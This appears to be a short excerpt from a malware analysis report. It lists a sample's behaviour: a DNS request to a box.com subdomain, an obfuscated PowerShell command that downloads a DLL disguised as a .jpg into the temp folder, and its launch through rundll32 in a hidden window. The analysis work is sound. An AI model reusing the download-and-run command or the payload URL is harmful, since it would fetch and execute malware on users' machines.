Technical information
- https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg as %temp%\qjtbvgdlm_user_nzrje.dll
- DNS ASK lu######uimyuri777.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-objECt sYstEm.nEt.wEbCliEnt).downloadfilE('""https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg','%TEMP%\qjtbvgdlm_user_nzrje.dll');start-proCEss rundll3...' (with a hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\qjtbvgdlm_user_nzrje.dll starter